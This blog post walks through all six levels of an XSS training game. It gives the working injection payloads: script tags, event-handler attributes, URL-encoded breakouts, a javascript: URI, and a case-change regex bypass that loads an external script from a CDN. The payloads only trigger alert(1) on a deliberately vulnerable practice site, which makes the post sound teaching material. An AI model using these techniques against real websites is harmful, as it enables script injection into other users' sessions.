XSS stands for Cross-Site Scripting, which is one of the attacks type on the Websites. In this article, I will be using https://xss-game.appspot.com to demonstrate how you can check for XSS bugs in different input parameters. They provide a wonderful platform where you can perform exercises on how XSS works.

Level – 1:


The first level is very basic, if you toggle the code and see how the input is rendering, you will see that whatever you put in the query is rendering as HTML. So If you put <script>alert(1)</script> in the query, the input will then be taken as HTML and will be rendered as the part of the page.

Level – 2 :

To complete this level, you have to write status in such a way that it takes user input so as to generate an alert. Now I have tried but the script tag is not working here. So, we need to use events that can be used with HTML which is by the way is rendered by the page behind. To execute alert I used this:
<a href=”blah” onmouseover=alert(1)>blah.com</a>

You can also use img tag and other different tags where you can put events and create an alert.

 

Level – 3:

In this level you have to understand code which is used in the URL, only if we can inject the correct characters we can get an alert.

The above code tells that HTML for the img tag will be inserted and the number that it will get after the hash will be the image number that we will be displayed on the page. So to inject the html in after the src i used this :
1′ onmouseover=”alert(1)”;

There always can be more than one ways to go anything. For me this one worked fine.

 

Level – 4:

This level is quite similar to the level 3, If you look at the hints in this, it says about html encode and decode chars.

The code for this code where we have to inject is the parameter called timer in the url.
The code that I inject to pass this level is:
%27)%3Balert(1)%3B(%27

The second hint for this level: When browsers parse tag attributes, they HTML-decode their values first. <foo bar=’z’> is the same as <foo bar=’&#x7a;’
The hint is stating everything. So I used HTML encode to encode this ‘;alert(1);(‘
The URL then looks like: https://xss-game.appspot.com/level4/frame?timer=3%27)%3Balert(1)%3B(%27

 

Level – 5: 

For this level to execute alert, we need to look at the value of next parameter in the URL and change it, so that rather than going confirm page. it generates alert.
javascript:alert(1) identifier works same as any event handler and you can use it instead of onclick to execute alert. The final URL will look like:
https://xss-game.appspot.com/level5/frame/signup?next=javascript:alert(1)

 

Level – 6:

In the 6th level, We need to load javascript from an external file which will then produce alert. To complete this level I wrote alert(1) in a js file and uploaded in my Github and hosted it using jsdelivr. 
Look at the code of this level. In the includeGadget function, you will see that there is an if condition and it uses regex to filter out the URLs that starts with https. We need to bypass this regex so that we can execute out external js file.

XSS bug bounty

My javascript file is here: https://github.com/JG1721/testscript/blob/master/jas.js
I hosted it with the help of jsdelivr, So my URL is: https://cdn.jsdelivr.net/gh/JG1721/testscript/jas.js

Now all we need to do is bypass regex, we can do it via using any uppercase and lowercase combination of https, since the regex only checks for lower letter https. If you write HTTPS, you can bypass it easily.
So the final URL is: https://xss-game.appspot.com/level6/frame#HTTPS://cdn.jsdelivr.net/gh/JG1721/testscript/jas.js

 

 

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.

%d bloggers like this: